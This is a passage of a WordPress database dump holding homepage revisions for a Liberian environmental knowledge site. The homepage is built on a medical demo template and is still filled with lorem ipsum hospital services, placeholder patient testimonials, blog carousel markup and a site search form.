/>\n													Nancy Green\n													Patient #3\n							Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/2017/09/img_301284.jpg\" alt=\"img_301284\" />\n													Frances Lopez\n													Patient #2\n							Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/2017/09/img_91227.jpg\" alt=\"img_91227\" />\n													Nick Smith\n													Patient #4\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://medical.oceanwp.org/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://medical.oceanwp.org/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://medical.oceanwp.org/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://medical.oceanwp.org/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://medical.oceanwp.org/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://medical.oceanwp.org/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://medical.oceanwp.org/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://medical.oceanwp.org/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://medical.oceanwp.org/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://medical.oceanwp.org/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://medical.oceanwp.org/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://medical.oceanwp.org/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://medical.oceanwp.org/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://medical.oceanwp.org/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://medical.oceanwp.org/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://medical.oceanwp.org/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://medical.oceanwp.org/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://medical.oceanwp.org/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://medical.oceanwp.org/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://medical.oceanwp.org/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://medical.oceanwp.org/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://medical.oceanwp.org/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://medical.oceanwp.org/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://medical.oceanwp.org/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->\n		','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 17:17:26','2019-11-08 17:17:26','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(393,1,'2019-11-08 17:17:32','2019-11-08 17:17:32','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics, Institutions Resources, and Other useful data.</p>		\n				<h3>\n					Cardiac Rehab\n				</h3>\n								<p>Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Gynecology\n				</h3>\n								<p>Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Symptom Check\n				</h3>\n								<p>Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Rehabilitation\n				</h3>\n								<p>Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					General Surgery\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					Pediatric Clinic\n				</h3>\n								<p>Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital</p>\n				<h3>\n					Emergency Departments\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					24/7 Services\n				</h3>\n								<p>Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.</p>\n			<h2>Reserve now in our hospital</h2>		\n		Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed		\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_563214.jpg\" title=\"\" alt=\"\" />											\n			<h3>Transplant Services</h3><p>Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_957412.jpg\" title=\"\" alt=\"\" />											\n			<h3>Pediatric Clinic</h3><p>Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_369542.jpg\" title=\"\" alt=\"\" />											\n			<h3>Dental Clinic</h3><p>Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n			<a href=\"#\" role=\"button\">\n						Register Now\n					</a>\n							saved hearts\n				+\n							happy patients\n				+\n							doctors number\n							saved lungs\n			<h2>What Our Patients Say</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n							Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_428339.jpg\" title=\"\" alt=\"\" />						\n													Mike Wright\n																			Patient #1\n							Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_324658.jpg\" title=\"\" alt=\"\" />						\n													Nancy Green\n																			Patient #3\n							Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_301284.jpg\" title=\"\" alt=\"\" />						\n													Frances Lopez\n																			Patient #2\n							Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_91227.jpg\" title=\"\" alt=\"\" />						\n													Nick Smith\n																			Patient #4\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 17:17:32','2019-11-08 17:17:32','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(394,1,'2019-11-08 17:20:58','2019-11-08 17:20:58','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics, Institutions Resources, and Other useful data.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n				<h3>\n					Cardiac Rehab\n				</h3>\n								<p>Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Gynecology\n				</h3>\n								<p>Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Symptom Check\n				</h3>\n								<p>Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Rehabilitation\n				</h3>\n								<p>Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					General Surgery\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					Pediatric Clinic\n				</h3>\n								<p>Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital</p>\n				<h3>\n					Emergency Departments\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					24/7 Services\n				</h3>\n								<p>Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.</p>\n			<h2>Reserve now in our hospital</h2>		\n		Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed		\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_563214.jpg\" title=\"\" alt=\"\" />											\n			<h3>Transplant Services</h3><p>Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_957412.jpg\" title=\"\" alt=\"\" />											\n			<h3>Pediatric Clinic</h3><p>Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_369542.jpg\" title=\"\" alt=\"\" />											\n			<h3>Dental Clinic</h3><p>Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n			<a href=\"#\" role=\"button\">\n						Register Now\n					</a>\n							saved hearts\n				+\n							happy patients\n				+\n							doctors number\n							saved lungs\n			<h2>What Our Patients Say</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n							Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_428339.jpg\" title=\"\" alt=\"\" />						\n													Mike Wright\n																			Patient #1\n							Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\n							<img 